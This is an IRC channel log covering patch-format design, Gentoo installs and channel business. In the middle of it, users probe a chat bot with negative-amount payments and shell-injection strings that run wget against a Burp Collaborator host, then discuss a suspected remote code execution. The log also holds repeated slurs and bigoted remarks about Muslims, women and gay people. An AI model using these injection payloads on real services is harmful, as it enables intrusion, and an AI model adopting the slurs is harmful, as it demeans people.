1792009;1522687637;mircea_popescu;asciilifeform aha. 1792010;1522687643;*;asciilifeform also had to look up wtf is/was 'npm' 1792011;1522687663;mircea_popescu;node.js, "we pantsuits can republic too!" 1792012;1522687679;asciilifeform;i'll admit my 1st thought was '... novell ??!' but then looked at calendar.. 1792013;1522687705;mircea_popescu;hey, novell netware is what got me into hand-written serial cable protocols. 1792014;1522687723;asciilifeform;lol metoo 1792015;1522687729;*;asciilifeform and never got out! 1792016;1522687737;mircea_popescu;honestly i don't recall being as infuriated with computers hence. 1792017;1522687745;mircea_popescu;i was younger then. 1792018;1522687914;mircea_popescu;"Qaisar Mahmood, a Muslim born in Pakistan, is the new head of the Swedish National Heritage Board." He admits "he has not read anything about Sweden’s cultural heritage." << bwahahaha 1792019;1522687972;asciilifeform;hey, 'if it contradicts the koran, it is heretical, if not -- superfluous' (tm)(r) or was that from the last go-around. 1792020;1522688000;mircea_popescu;and the funniest part of all of this is that they're somehow not calling it rape. 1792021;1522688002;ben_vulpes;so, no tickerbot anymore? 1792022;1522688012;mircea_popescu;rape is only when a white boy on campus gets his nerve up to say hi 1792023;1522688053;mircea_popescu;ben_vulpes shinohai got an identity crisis after finding out he's lagging behind, is either genuinely finding his way out or else sulking somewhere waiting for the usual disasters to befal. 1792024;1522688064;ben_vulpes;certainly looks that way 1792025;1522688146;mircea_popescu;the notion there exists a fiatola bitcoin price was due for a trashing anyway ; part and parcel of a collection of quaint nonsense like the flat earth on turtles and the predictive power of phrenology. 1792026;1522688246;mircea_popescu;"3x as many male managers are now uncomfortable mentoring women in the wake of #MeToo. This is a huge step in the wrong direction. We need more" << roflmao. 1792027;1522688262;mircea_popescu;oh, wait, being an annoying bitch doesn't work ?!?! ONOES!! WHO COULD HAVE PREDICTED! 1792028;1522688267;mircea_popescu;backpedal goes in anus nao ? 1792029;1522688443;mircea_popescu;anyway ; training the "woke" in any sort of skilled anything is seriously immoral. knowledge is not to be used for evil. 1792030;1522688465;ben_vulpes;mircea_popescu: how about 0.195 btc for the big box 1792031;1522688486;mircea_popescu;ill get back to you. 1792032;1522688525;ben_vulpes;i'd also like to buy an option to buy the s.nsa spare if you're amenable 1792033;1522688550;mircea_popescu;um. 1792034;1522688574;mircea_popescu;we just discussed this ; s.nsa is at the most selling one of the two spares. ill run the numbers later an' give you an aye or nay. 1792035;1522688582;ben_vulpes;ok thanks 1792036;1522688651;mircea_popescu;http://www.dailymail.co.uk/news/article-5351133/Eastern-Europeans-10-times-faster-farm-work-Brits.html << fucking hysterical. entirely useless precious cuntlets somehow stop short of wondering why the fuck their government has to import muslims by the million as the only people troglodyte enough to fuck their dumb cunts. 1792037;1522688791;mircea_popescu;https://www.nytimes.com/2018/02/06/us/baltimore-police-corruption.html << and in other news, turns out baltimore is becoming the first city liberated by republican militias from the terrorist self-appointed usg ? 1792038;1522688802;mircea_popescu;anyone wanna move there, build a stronghold ? 1792039;1522688952;mircea_popescu;piddly $100k career take for "elite" representatives of the embattled government ? vulnerable as all hell. 1792040;1522689039;deedbot;http://pizarroisp.net/index.php/2018/04/02/php-hosting-and-mysql-dbs-now-available-on-pizarro-shared-hosting/ << PizzaroISP - PHP Hosting and MySQL DBs now available on Pizarro shared hosting 1792041;1522689310;asciilifeform;'They stole $100,000, which was half the money in the safe...' << wat 1792042;1522689320;asciilifeform;why steal ~half~ 1792043;1522689327;asciilifeform;who does this. 1792044;1522689374;*;asciilifeform reads end of $crapola, and discovers nominal reason, lol 1792045;1522690127;mircea_popescu;the usg employee that told the truth hasn't been seen this decade. 1792046;1522690173;asciilifeform;nah, that's ~last~ decade. ~this~ decade nobody's even seen one that sold a half-believable dose of flimflam. 1792047;1522690244;mircea_popescu;right. 1792048;1522690484;BingoBoingo;In other news: Holy Shit! "D'Selby Gotas Nasales" are fast! 1792049;1522690554;mircea_popescu;ephedrine ? 1792050;1522690588;BingoBoingo;Nafazolina 1792051;1522690603;BingoBoingo;And a fuck ton of boric acid apparently 1792052;1522690678;BingoBoingo;Easily squeezed a couple ounces of fluid from my sinuses in the first few minutes pursuing nasal stability 1792053;1522690689;BingoBoingo;And probably killed any ants lurking there too 1792054;1522690869;mircea_popescu;iirc that created the problem it cured ? 1792055;1522690899;deedbot;http://qntra.net/2018/04/china-raises-tariffs-on-us-agricultural-exports/ << Qntra - China Raises Tariffs On US Agricultural Exports 1792056;1522690916;asciilifeform;verily, that's the nose spray where for every litre of snot you would have otherwise disgorged, instead there will be 2 to pay 1792057;1522690919;asciilifeform;'on installment' 1792058;1522690935;trinque;neti pot and salt water works better than anything 1792059;1522690943;trinque;just remove whatever your body didn't want there, and that's that 1792060;1522691176;mircea_popescu;usg medicine is very much like usg "technology" aka web development : "hey, it seems to work!" 1792061;1522691714;BingoBoingo; iirc that created the problem it cured ? << Well, temporarily aggrevated the problem it treats 1792062;1522691815;BingoBoingo; 'on installment' << Rebound effect is normal only when you go beyond three applications. This is more spackiling over the acute phase. 1792063;1522692125;deedbot;http://trilema.com/2018/minigame-smg-march-2018-statement/ << Trilema - MiniGame (S.MG), March 2018 Statement 1792064;1522696369;deedbot;http://trilema.com/2018/trilema-pages-restructuring/ << Trilema - Trilema pages restructuring. 1792065;1522697209;hanbot;hey mircea_popescu: people are wanting to get an mp-wp --is my understanding of the situation correct, ie proablem i had with making vdiff --> proablem with v itself --> folks are reformulating these? 1792066;1522697480;mircea_popescu;hanbot atm phf is re-grinding his vdiff to include histfile and afaik you didn't have hosting ? did that meanwhile resolve ? 1792067;1522697555;hanbot;was given hosting keyfob yest. evening, will be getting whet.net back today/tomorrow 1792068;1522697621;mircea_popescu;ah. so then get the whet back and see from there. maybe new vdiff is ready ; if not and you want to march you can apply spyked's patch on the extant codebase as published by phf, if i understand correctly that should fix your problem. the diffs you produce with the thing thereby compiled will work with later restared vdiff too. 1792069;1522697644;hanbot;ah okay. thanks! 1792070;1522701952;mircea_popescu;aaand in other "we used to think romanians are specifically retarded, but then the usians went and joined up!" sads, http://www.dianacoman.com/blog/2011/08/08/referintele-ca-niste-punti-lipsa/ 1792071;1522706691;asciilifeform;trinque, phf , other vtronicists : http://therealbitcoin.org/ml/btc-dev/2018-April/000296.html 1792072;1522706903;*;mod6 looks 1792073;1522706958;asciilifeform;plz do not treat these as homeworks, mod6 , they are there for illustration 1792074;1522706964;mod6;ok 1792075;1522707132;asciilifeform;( tldr : it's a demo of a guaranteed-cure for the infamous ' moving mpi dir ' misery . ) 1792076;1522707203;*;asciilifeform bbl 1792077;1522707620;trinque;neato vchain asciilifeform 1792078;1522708322;asciilifeform;lemme know if any part of it did not make sense, or if i laughably misunderstood the orig trinque-algo. 1792079;1522708491;*;trinque will read 1792080;1522712967;mircea_popescu;asciilifeform basically breaks every patch up into single-file units ? 1792081;1522712989;asciilifeform;mircea_popescu: well, consolidates, rather than breaks up, but correct. 1792082;1522713004;asciilifeform;every patch has exactly one --- and +++ : at the head. 1792083;1522713022;asciilifeform;each followed by exactly 1 hash ( or, in the case of genesis, 'false' . ) 1792084;1522713077;mircea_popescu;basically you add all files into a temp together, space-separated ? 1792085;1522713155;asciilifeform;nope. there is no inbandism, literally any combination of characters is legal in the single file. 1792086;1522713192;asciilifeform;the algo is in http://therealbitcoin.org/ml/btc-dev/attachments/20180331/asciilifeform_crystals.vpatch , or i could summarize for the impatient 1792087;1522713200;mircea_popescu;i'm reading. 1792088;1522713259;mircea_popescu;"print decoration" ? 1792089;1522713291;mircea_popescu;(i get it, i get it, you use the republican-standard declare-size cut method. yes yes.) 1792090;1522713294;asciilifeform;the #####...#### thing. it can contain literally anything, purely for ease of eyes. 1792091;1522713298;asciilifeform;correct. 1792092;1522713349;mircea_popescu;this is where we admit that while the alternative solution presented passes on technical merits, nevertheless the thing it's an alternative to has much better political support. i ~want~ to require people to say a word about their patch, for human eyes. 1792093;1522713379;asciilifeform;it isn't an alternative, imho we really gotta have the chronicles. 1792094;1522713398;asciilifeform;it's an alternative to the idjit unix multifile diff that doesn't let you move files without barfing megs of liquishit into the diff. 1792095;1522713449;asciilifeform;it has also added seekrit bonus of making the patch format non-inbandistic. 1792096;1522713464;mircea_popescu;at which juncture i suppose it'd pay to check, huh. hey phf, my memory of logs discussion includes this item whereby the above problem was fully resolved by declaring the path as inseparable part of the filename. you on the same page ? 1792097;1522713501;mircea_popescu;"all files are identified by hashes of their (proper) name and content" and all that. 1792098;1522713594;asciilifeform;it would be correct also to say that dir2txt/txt2dir abstracts over the idea of unix filenames entirely. 1792099;1522713610;asciilifeform;( transforms whole spittoon into 1 strand, and back, as necessary ) 1792100;1522713639;mircea_popescu;myeah. the only problem is that i suspect the unix notion of filenames (if ~properly~ regarded, ie, full paths) is actually entirely correct, and how gns will have to work anyway. 1792101;1522713671;asciilifeform;it's correct but woefully incomplete, offers no compact way to represent movement. 1792102;1522713686;mircea_popescu;gns:mircea/writings/trilema/categories/ is just about the only way to corectly refer to the item. 1792103;1522713696;asciilifeform;and observe, would work entirely ok with given algo. 1792104;1522713703;asciilifeform;it is not married to particular form of path. 1792105;1522713746;mircea_popescu;asciilifeform the logged discussion on the topic was, "if hashes match but paths do not, the file was moved ; if hashes match and paths match, the file is untouched ; if hashes do not match but paths match the file was modified ; if hashes do not match and paths do not match the file was created/deleted" 1792106;1522713749;mircea_popescu;this is complete. 1792107;1522713779;asciilifeform;how would you represent the movement tho 1792108;1522713785;asciilifeform;in the actual vpatch format 1792109;1522713794;mircea_popescu;case 1 : the hash matches but the path does not. 1792110;1522713810;asciilifeform;aa 1792111;1522713851;mircea_popescu;file a/hurr/durr.txt hash aba1 matches file b/hurr/hurr.txt hash aba1, durr.txt was renamed as hurr.txt (renaming and moving are, like norton commander correctly identified, the SAME op. it's all a namechange.) 1792112;1522713870;mircea_popescu;press f8. 1792113;1522713876;asciilifeform;this scheme would however lock you into not ever both moving and modifying a given file, if you want the diff to be compact 1792114;1522713886;asciilifeform;(*within 1 patch) 1792115;1522713896;mircea_popescu;yes, the idea was to make a "reorg" patch separately if you're going to move files about. 1792116;1522713905;mircea_popescu;which is proper, the moving should be costly. 1792117;1522713956;phf;mircea_popescu: we're on the same page 1792118;1522713983;mircea_popescu;meanwhile otherplaces, "shared libraries are obviously a good idea until you’ve actually used them. then whether it’s obvious or not that they’re a bad idea is mostly a matter of how close you are to trying to get them to work." such a great share that anant thing. 1792119;1522713988;asciilifeform;mircea_popescu: your algo as far as i can tell worx perfectly well. mine however is simpler. ( and also worx ) 1792120;1522714016;mircea_popescu;asciilifeform yeah. 1792121;1522714018;mircea_popescu;and so you check the dood's bio, and "I currently work at Ozlo, where we’re building an AI-powered digital assistant. Previously, I worked at Firebase, a scalable realtime application backend. Before that, I worked on a wide range of experimental projects to improve the web at Mozilla Labs." 1792122;1522714031;asciilifeform;( i would not even bother posting it, but it does cure inbandism, and afaik nobody else has proposed of a way to ) 1792123;1522714040;mircea_popescu;just... why the fuck! "i am an intelligent fellow. i have these dumbells on my feet ; and this loudspeaker screaming in my ears". dude... 1792124;1522714076;mircea_popescu;asciilifeform seems to me a correctly designed and properly implemented version of trinque 's original doodle, which he summarily described as "bundle all files together and hash" 1792125;1522714086;asciilifeform;aha. 1792126;1522714087;trinque;mircea_popescu: bet you the dood even read it. 1792127;1522714094;asciilifeform;hence i called 'trinquian vtron' 1792128;1522714100;mircea_popescu;trinque hm ? 1792129;1522714100;trinque;harrison bergeron I mean. 1792130;1522714119;mircea_popescu;a. yes. 1792131;1522714150;mircea_popescu;it's just... jesus christ i am at a loss to comprehend what the problems involved are. fuck me, i'm working on an ai sex bot to fetlife ? really ? 1792132;1522714153;phf;asciilifeform: well you followed an established tmsr solution to inbandism, state the counts before you present the count. 1792133;1522714159;mircea_popescu;it's not even the timewaste per se, it's the subjective relation to it. 1792134;1522714168;asciilifeform;phf: afaik it's the only solution. 1792135;1522714178;mircea_popescu;it is provably the only possible solution. 1792136;1522714210;phf;btw unified diff also follows the same format. you can use @@ ... @@ to know exactly when your hunk ends (see the vpatch code) 1792137;1522714219;mircea_popescu;aha. 1792138;1522714226;asciilifeform;aha, asking for 'different solution' would be rather like asking for 'different pythagor's theorem' 1792139;1522714316;phf;there's an implicit inbandism in unified diff though, which is the requirement for diff to be a POSIX "text file", so you still have arbitrary, and unknowably, large "lines" 1792140;1522714362;mircea_popescu;i don't remember what you said when i asked if your new diff diffs binaries ? 1792141;1522714388;asciilifeform;phf: this is curable by not using unix diff. the only lines ~produced~ by dir2txt ab initio are the decorative ones and the 1234 @ filepath . all other bytes are copies as-they-are and line-agnostically. 1792142;1522714400;asciilifeform;*copied 1792143;1522714514;phf;mircea_popescu: it doesn't now, there's no reason why it can't, diffing binaries is a different beast from text diffing, so it's about adding a new kind of hunk/header formats that say "this here follows a binary diff" 1792144;1522714564;mircea_popescu;"ulrich drepper's famous page on". famous ? really ? how the FUCK is anything drepper did even vaguely worth the mention, let alone "famous" ? oh, because pantsuits push it, ie http://trilema.com/2012/a-conversation-with-frank-zappa-ix/#selection-231.0-233.634 ? hurr! 1792145;1522714584;mircea_popescu;phf that's the issue in my head, of no practical consequence as it is : why, exactly, different beast, and how ? 1792146;1522714595;asciilifeform;fwiw my format will actually eat bins without problem. ( you would still need a tool to 'human-display' them. and a differ other than unix diff. but the 'crystal' format holds arbitrary bytes, noprob ) 1792147;1522714600;mircea_popescu;if you have the time i'll hussle you with annoying fundamental questions. if not, later. 1792148;1522714614;mircea_popescu;asciilifeform yeah. 1792149;1522714926;phf;mircea_popescu: let's revisit this question in a couple of days, i'll give it some thought too. i want to finish regrind in the next day before hanbot is done with standing up her mp-wp instance 1792150;1522714931;mircea_popescu;np 1792151;1522714957;phf;it looks like i'm going to wrap up the rest of the "replicate diff/patch" this week, so that'll also be the time to start adding the clever features 1792152;1522715007;mircea_popescu;it also looks like douchebag ran out of chicks in his discordbook, so we shall enjoy productivity unblemished lel 1792153;1522715117;phf;tmsr tests your fuzzy numbers, it's where "plenty" becomes "~3-5" or more often than not "none at all" 1792154;1522715139;mircea_popescu;hehe. 1792155;1522715186;mircea_popescu;part and parcel of the problem of postmodernity, and the deep cause behind all the superficiality, is that nobody ever gets a run for his money. like in overadvanced (supercowardly) species, the whole contest of life consists of display and nothing more. 1792156;1522715274;mircea_popescu;(as you might intuit, i was a terror as a 5yo being introduced to darwinism. "so why did the other birdy quit ?" "well the guy was bigger." "so ?" "so he's affraid of him." "why ?" "because he's bigger." "So what if he's bigger ? what could he do ? just flies around like an idiot" "could peck it" "so could the smaller one!" and on and on.) 1792157;1522716254;douchebag;ill find more whores 1792158;1522716264;douchebag;just busy with work last few days 1792159;1522716267;douchebag;also let me try something 1792160;1522716304;douchebag;!!pay -0.01 128BUcwkYM4AK2k6TXEg8RvA83kxL6Sw9Y 1792161;1522716313;deedbot;Get your OTP: http://p.bvulpes.com/pastes/QHOjJ/?raw=true 1792162;1522716337;douchebag;!!balance 1792163;1522716342;deedbot;http://p.bvulpes.com/pastes/EqbW1/?raw=true 1792164;1522716411;douchebag;!!v 387FBFD7CBFF96A786BA6603955FF979E301422D9E722AA258E45C174B949086 1792165;1522716460;douchebag;!!pay -0.01 douchebag 1792166;1522716466;deedbot;Get your OTP: http://p.bvulpes.com/pastes/9WVyn/?raw=true 1792167;1522716495;douchebag;!!v 515B68D8A92E5C93C110EEA41B63B623FFCAC88F8F61DD243D5DE2E71C1A0AD2 1792168;1522716506;douchebag;!!balance 1792169;1522716511;deedbot;http://p.bvulpes.com/pastes/EuIId/?raw=true 1792170;1522716549;douchebag;That's all the testing for that matter 1792171;1522716638;douchebag;The idea was that if the bot subtracts the value I send Ie: Balance - - 0.01 it would actually become balance + 0.01 because maths 1792172;1522716676;asciilifeform;the folx who Never Suspected minus sign exists -- live elsewhere 1792173;1522716696;douchebag;And if the bot was checking if my balance is greater or equal to the value sent, it would obviously pass 1792174;1522716732;douchebag;I actually have found that in web applications before 1792175;1522716775;asciilifeform;this is why work with 'web applications before' is catastrophically terrible for yer health, douchebag . it is like building a wrestling career against kindergarteners. 1792176;1522716826;douchebag;It's mostly entertainment 1792177;1522716980;douchebag;It also leads me to wonder if there are any race conditions in deedbot 1792178;1522717175;trinque;no, there are not. 1792179;1522717185;trinque;and wtf, pay negative, you think I didn't handle that? 1792180;1522717210;trinque;where's my report on trb dependencies? 1792181;1522717249;douchebag;I'll get on that now, just got home from work 1792182;1522717250;*;asciilifeform inevitably recalls the parable with the drunkard, who searched for the lost coin 'where the light is', rather than where he had dropped it 1792183;1522717317;douchebag;What distro would you suggest doing a fresh install on? 1792184;1522717452;trinque;gentoo'd be a fine choice 1792185;1522717496;douchebag;That'd be interesting - I have minimal experience with gentoo 1792186;1522717650;mircea_popescu;asciilifeform he has a point, javascript is fulla it. 1792187;1522717673;mircea_popescu;also if you manage to upset the developer's expectation javascript uses ints, it'll fail all sorta 4.9999998 = 5 tests 1792188;1522717694;trinque;this'd be why I didn't use the floopy lisp for the math (yes, could've done the checks in floopy lisp, but.) 1792189;1522717701;mircea_popescu;myeah. 1792190;1522717730;mircea_popescu;douchebag there's an almost-official gentoo version floating about, we're working towards making it definitive. 1792191;1522717803;douchebag;interesting 1792192;1522717822;trinque;https://trinque.org/2017/12/30/wip-cuntoo-installer/ << latest thing published on subj 1792193;1522717843;trinque;but as dianan_coman observed, the outside world moved, while the thing hadn't yet eaten enough of the outside world. 1792194;1522717870;trinque;idea is portage, the gentoo package build system, is redone in V 1792195;1522717942;trinque;but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done. 1792196;1522718172;mircea_popescu;!!pay 123456789012345678901234567890123456789012345678901234567890.123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 1792197;1522718175;deedbot;Get your OTP: http://p.bvulpes.com/pastes/LfewT/?raw=true 1792198;1522718213;douchebag;no integer overflow 1792199;1522718230;mircea_popescu;deedbot the imperturbable. 1792200;1522718263;trinque;loller 1792201;1522718309;trinque;command is a dumb string until the OTP is confirmed, and then gets parsed and certain type demands are made of the result 1792202;1522718338;trinque;which, if fail, straight into oblivion with it 1792203;1522718390;douchebag1;!!subscribe http://test.com/$(`wget http://z110uzd1g39afotqos51hlm66xco0d.burpcollaborator.net/lolz.txt`) 1792204;1522718391;deedbot;douchebag1 subscription to http://test.com/$(`wget failed 1792205;1522718409;douchebag1;!!subscribe http://test.com/$(`wget${IFS}http://z110uzd1g39afotqos51hlm66xco0d.burpcollaborator.net/lolz.txt`) 1792206;1522718410;deedbot;douchebag1 subscription to http://test.com/$(`wget${IFS}http://z110uzd1g39afotqos51hlm66xco0d.burpcollaborator.net/lolz.txt`) failed 1792207;1522718419;ben_vulpes;dude you gotta do this shit in pm 1792208;1522718439;douchebag1;kk 1792209;1522718475;trinque;also subscribe lever has been removed for something like a year, and I've been processing subscription requests by hand 1792210;1522718481;douchebag1;Ah 1792211;1522718488;mircea_popescu;lmao 1792212;1522718489;douchebag1;Did anyone click that 1792213;1522718493;douchebag1;Because I got a hit 1792214;1522718501;ben_vulpes;likely an archive bot 1792215;1522718501;mircea_popescu;douchebag1 bot autoarchives 1792216;1522718501;douchebag1;it doesn't look like wget though 1792217;1522718592;mircea_popescu;in other lulz, "Hey! I'm Ashley. I'm an 18 year old girl living in Houston, TX who's in a bit of a financial bind at the moment. I'm a senior in high school. I don't even have my drivers license or a ride to work so it's not like I can get a normal job at the moment." 1792218;1522718602;mircea_popescu;if anyone living in houston wants her profile. 1792219;1522718663;trinque;lol nah I had one of those before, wrong jusrisdiction to straighten her out, as per the definitive trilema. 1792220;1522718838;mircea_popescu;https://preview.ibb.co/eODLsH/000561fd_fca2_e814_01a7_4981143cd1f1_958.jpg the typical gingerly first timer anal-izer. 1792221;1522719817;douchebag;trinque: For my writeup, do you want exploits that can actively be exploited on trb or just exploits in the dependencies used? 1792222;1522719959;trinque;if yes, why, if not, why not, would be great. 1792223;1522719990;douchebag;Sounds good 1792224;1522727884;mircea_popescu;so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. 1792225;1522728836;lobbes;finally sat down and learned some basic sed commands. I especially love the ability to chose an alternate delimiter; makes certain cases of escaping characters a breeze! 1792226;1522728893;*;lobbes currently hacking a script to convert all the absolute references in my downloaded kibo.com to relative 1792227;1522728930;mircea_popescu;yep. %%% is better than /// 1792228;1522729008;lobbes;turns out the whole kibo site is only 40 mb or so, so I figured I'd try and mirror the whole thing (after browsing it last night, I realized that the meta aspects of the site are part of the fun) 1792229;1522729025;lobbes;plaintext dun do it justice 1792230;1522729044;*;trinque suddenly regrets whatever space unescaping \/ is taking up in his skull. 1792231;1522729049;mircea_popescu;lobbes here's a bonus : suppose you have a lengthy file (such as say a server log) and you want to extract just one column. you got awk : cat hurr.txt | awk '{print $3}' (and -F will set the delimiter if space's no good). 1792232;1522729081;mircea_popescu;trinque i despise tools that make you escape. really, it's fucking dumb, let the metachar be settable so i can not need it. 1792233;1522729164;mircea_popescu;and now consider something like cat *** | grep "data.maryland.gov" | awk '{print $19..$22}' | sort -u << "get me the fields 19th through 22nd, once only, and sorted alphabetically". 1792234;1522729175;mircea_popescu;sed + awk are the excel of posix. 1792235;1522729283;mircea_popescu;and as it has to be said : you are not a man until you've played a browser game through curl, pipe and awk/sed. 1792236;1522729319;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-2#324071 << how did these numbers come out? 1792237;1522729319;mimisbrunnr;Logged on 2018-04-02 16:54 mircea_popescu: we just discussed this ; s.nsa is at the most selling one of the two spares. ill run the numbers later an' give you an aye or nay. 1792238;1522729384;mircea_popescu;still working on it. 1792239;1522729467;ben_vulpes;kk 1792240;1522729668;mircea_popescu;asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true 1792241;1522733432;mircea_popescu;in other webamusements, https://www.themastermindwithin.com/thoughts/blog-traffic-and-income-report-march-2018/ 1792242;1522733435;mircea_popescu;"In March 2018, the blog had 7,556 page views and I made $27.09!!" 1792243;1522735301;mircea_popescu;and in case anyone is missing the usagi era of bitcoin, it didn't end, it just moved on : http://behindmlm.com/companies/empower-network/david-wood-claims-he-can-heal-cancer-herpes-hiv-aids-diabetes/ 1792244;1522741024;ben_vulpes;!!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 1792245;1522741024;deedbot;ben_vulpes updated rating of shinohai from 1 to -1 << ran off and took a rather useful tool with him 1792246;1522742435;ben_vulpes;anyone want to buy some electronics off amazon for me, get reimbursed in btc? 1792247;1522742798;deedbot;http://pizarroisp.net/index.php/2018/04/03/pizarro-statement-march-2018/ << PizzaroISP - Pizarro Statement, March 2018 1792248;1522758506;shinohai;logs.bvulpes.com/trilema?d=2018-4-3#324450 <<< have used your script, and it's former incantaion from years ago - very useful things. My solution thus far is simply running a binhost locally, which is temporary as I try to tweak recipe for amd64. 1792249;1522758507;mimisbrunnr;Logged on 2018-04-03 01:03 trinque: but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done. 1792250;1522758551;shinohai;Also, trinque is your www of wot not updating at this time? 1792251;1522758593;shinohai;Which brings me to: 1792252;1522758610;shinohai;http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. 1792253;1522758611;mimisbrunnr;Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 1792254;1522758636;shinohai;Have a great day #trilema! 1792255;1522758651;shinohai;Nos veremos despues. 1792256;1522759115;douchebag;hey guys 1792257;1522759129;douchebag;I think I got remote code execution on someones box 1792258;1522759144;douchebag;https://i.imgur.com/pPZlvQC.png 1792259;1522759162;douchebag;the IP address begins with 174.108 1792260;1522759179;douchebag;If that's one of you, please contact me and I will help you resolve this issue 1792261;1522759837;mod6;mornin! 1792262;1522759857;mod6;shinohai, if you could bring that thing that'd be nice. 1792263;1522759911;mod6;meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily. 1792264;1522764391;lobbes;I think shinohai was going to try and send me tars of jhvh1 sometime >> http://btcbase.org/log/2018-03-24#1789503 1792265;1522764391;a111;Logged on 2018-03-24 00:50 shinohai: I can tar the plugins up for you if you need 'em. 1792266;1522764408;lobbes;either way, I'll try and slap up a vanilla gribble on my pizarro shell later this night 1792267;1522764606;lobbes;how much fiat are we talkin'? If it is roughly under $500 I would be very interested >> http://btcbase.org/log/2018-04-03#1792246 1792268;1522764606;a111;Logged on 2018-04-03 08:00 ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc? 1792269;1522764641;*;lobbes bbl; off to the saltmines 1792270;1522765867;ben_vulpes;grade a smarm 1792271;1522765875;ben_vulpes;lobbes: mk i'll letcha know 1792272;1522766063;douchebag;Hey, would you guys be able to show me up a pizarro shell for trb? 1792273;1522767821;asciilifeform;mircea_popescu: http://btcbase.org/log/2018-04-03#1792240 >>> http://p.bvulpes.com/pastes/fIWW0/?raw=true 1792274;1522767821;a111;Logged on 2018-04-03 04:27 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true 1792275;1522767874;asciilifeform;http://btcbase.org/log/2018-04-03#1792259 << neither mine nor anyone i know of 1792276;1522767874;a111;Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108 1792277;1522767894;asciilifeform;http://btcbase.org/log/2018-04-03#1792258 << this pic is distinctly uninformative , i'd like to note 1792278;1522767894;a111;Logged on 2018-04-03 12:39 douchebag: https://i.imgur.com/pPZlvQC.png 1792279;1522767935;douchebag;asciilifeform: Basically last night I was sending commands in the bot that would lead to remote code execution 1792280;1522767956;douchebag;The code execution being wget the url provided in case of blind RCE 1792281;1522767989;asciilifeform;douchebag: ok, so carry on, put up a goatse on deedbot.org or whatever you normally do 1792282;1522768021;douchebag;well it isn't deedbots IP 1792283;1522768022;asciilifeform;tho the moar likely explanation is that trinque read the machine log, and, laughing, went to look at what was in yer intended payload url 1792284;1522768032;asciilifeform;but i'll let him answer this one. 1792285;1522768059;douchebag;Yeah I figured that was a possibility, I just figured I would mention that incase the code did get executed by anything unintentionally 1792286;1522768076;asciilifeform;this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day. 1792287;1522768102;asciilifeform;and uudecode payloads, deobfuscate js , whatever. 1792288;1522768136;asciilifeform;( and typically very disappointing, usually quite uninspiring, stale '1000-days' ) 1792289;1522768228;asciilifeform;http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai 1792290;1522768228;a111;Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. 1792291;1522768229;mimisbrunnr;Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 1792292;1522768417;asciilifeform;douchebag: consider, 174.108. is a konsoomer cable isp in usa . 1792293;1522768443;asciilifeform;('time-warner' co. ) 1792294;1522768687;trinque;douchebag: that is not any of my IPs 1792295;1522768695;trinque;what'd you do that got it to belch? 1792296;1522769078;douchebag;no clue, I just checked the logs and saw that lolz.txt was grabbed via wget 1792297;1522769357;trinque;auditor: "says here you talk like a fag, and your shit's all retarded" 1792298;1522769369;shinohai;http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? 1792299;1522769369;mimisbrunnr;Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai 1792300;1522769377;trinque;douchebag: I'm asking what the test was, which involved lolz.txt 1792301;1522769455;asciilifeform;shinohai: ben_vulpes made the reason for his neg quite unmysterious, imho 1792302;1522769467;shinohai;but i like salt, my popcorn has been a bit bland of late. 1792303;1522769544;shinohai;ben_vulpes is also aware *why* checking if bot is in #trilema these days is kinda low on list of priorities, as i am in field and only read logs. 1792304;1522769553;shinohai;I don't see join/parts 1792305;1522769608;douchebag;trinque: I was just issuing commands to the bot 1792306;1522769632;douchebag;ie: !!send $(wget http://site.com/lolz.txt) 1792307;1522769663;douchebag;And I saw the file actually was requested with wget from an IP address I did not recognize 1792308;1522769682;trinque;yeah I followed that part the first time 1792309;1522769693;douchebag;Okay so what's the question? 1792310;1522769704;trinque;after which command did you get a boop 1792311;1522769730;douchebag;I have no clue - I woke up this morning and saw it in the logs 1792312;1522769737;douchebag;I tried a number of different requests 1792313;1522769741;douchebag;i mean commands 1792314;1522769764;trinque;gpg me the full IP? 1792315;1522769854;shinohai;I mean, i still can't play eulora because minigame.bz/ hasn't a server, but i certainly didn't negrate the lot of the #pizarro folks. 1792316;1522769889;trinque;shinohai: weren't you running a bot? 1792317;1522769898;trinque;instead of whining about it, why not bring back said bot 1792318;1522769921;shinohai;yup and it shall rejoin as soon as i get back @ desk. my apologies for inconvenience 1792319;1522769942;shinohai;whining indeed. 1792320;1522769973;trinque;yes, whining. indeed. 1792321;1522773380;BingoBoingo; so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are 